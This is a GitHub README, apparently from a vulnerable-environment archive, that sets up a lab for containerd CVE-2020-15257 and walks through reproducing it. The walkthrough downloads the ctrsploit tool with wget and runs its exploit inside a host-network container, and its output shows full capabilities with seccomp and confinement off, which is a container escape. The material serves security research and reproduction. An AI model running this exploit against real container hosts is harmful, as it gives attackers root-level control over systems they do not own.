Skip to content

cve-2020-15257

Directory actions

More options

Directory actions

More options

Latest commit

 

History

History

cve-2020-15257

README.md

containerd CVE-2020-15257

  • dqd:
    • ssst0n3/docker_archive:cve-2020-15257 -> ssst0n3/docker_archive:cve-2020-15257_v0.1.0
    • ssst0n3/docker_archive:cve-2020-15257_v0.1.0
  • ctr:
    • ssst0n3/docker_archive:ctr_cve-2020-15257 -> ssst0n3/docker_archive:ctr_cve-2020-15257_v0.1.0
    • ssst0n3/docker_archive:ctr_cve-2020-15257_v0.1.0

usage

$ cd vul/cve-2020-15257
$ docker compose -f docker-compose.yml -f docker-compose.kvm.yml up -d

reproduce

$ ./ssh
root@localhost:~# docker run -ti --net=host busybox ash

/ # wget https://github.com/ctrsploit/ctrsploit/releases/latest/download/ctrsploit_linux_amd64 -O /usr/bin/ctrsploit
/ # chmod +x /usr/bin/ctrsploit
/ # ctrsploit vul CVE-2020-15257 checksec
[Y]  CVE-2020-15257	# Access containerd-shim's abstract unix socket when running in a container with host network namespace.
/ # ctrsploit vul cve-2020-15257 exploit -t
INFO[0000] connecting to /containerd-shim/9c26555c4f106b2659aef339d02a35172c10a4ddabbf43e884fd61bde37b475e.sock 
/ # grep CapEff /proc/self/status
grep CapEff /proc/self/status
CapEff:	0000003fffffffff
/ # grep Seccomp /proc/self/status
grep Seccomp /proc/self/status
Seccomp:	0
/ # cat /proc/self/attr/current
cat /proc/self/attr/current
unconfined
/ # ps -ef 
ps -ef 
PID   USER     TIME  COMMAND
    1 root      0:00 {systemd} /sbin/init
...
  676 root      0:00 docker run -ti --net=host busybox ash
  686 root      0:00 containerd-shim -namespace moby -workdir /var/lib/containe
  703 root      0:00 ash
...
 1188 root      0:00 ctrsploit vul cve-2020-15257 exploit -t
 1216 root      0:00 /bin/sh
 1231 root      0:00 [kworker/u4:3-ev]
 1233 root      0:00 ps -ef

env details

$ ./ssh
root@localhost:~# docker version
Client: Docker Engine - Community
 Version:           19.03.13
 API version:       1.40
 Go version:        go1.13.15
 Git commit:        4484c46d9d
 Built:             Wed Sep 16 17:02:52 2020
 OS/Arch:           linux/amd64
 Experimental:      false

Server: Docker Engine - Community
 Engine:
  Version:          19.03.13
  API version:      1.40 (minimum version 1.12)
  Go version:       go1.13.15
  Git commit:       4484c46d9d
  Built:            Wed Sep 16 17:01:20 2020
  OS/Arch:          linux/amd64
  Experimental:     false
 containerd:
  Version:          1.3.7
  GitCommit:        8fba4e9a7d01810a393d5d25a3621dc101981175
 runc:
  Version:          1.0.0-rc10
  GitCommit:        dc9208a3303feef5b3839f4323d9beb36df0a9dd
 docker-init:
  Version:          0.18.0
  GitCommit:        fec3683
root@localhost:~# cat /etc/os-release 
NAME="Ubuntu"
VERSION="20.04.6 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04.6 LTS"
VERSION_ID="20.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=focal
UBUNTU_CODENAME=focal
root@localhost:~# uname -a
Linux localhost.localdomain 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux

build

make all DIR=vul/cve-2020-15257

for developers:

FROM ssst0n3/docker_archive:ctr_cve-2020-15257_v0.1.0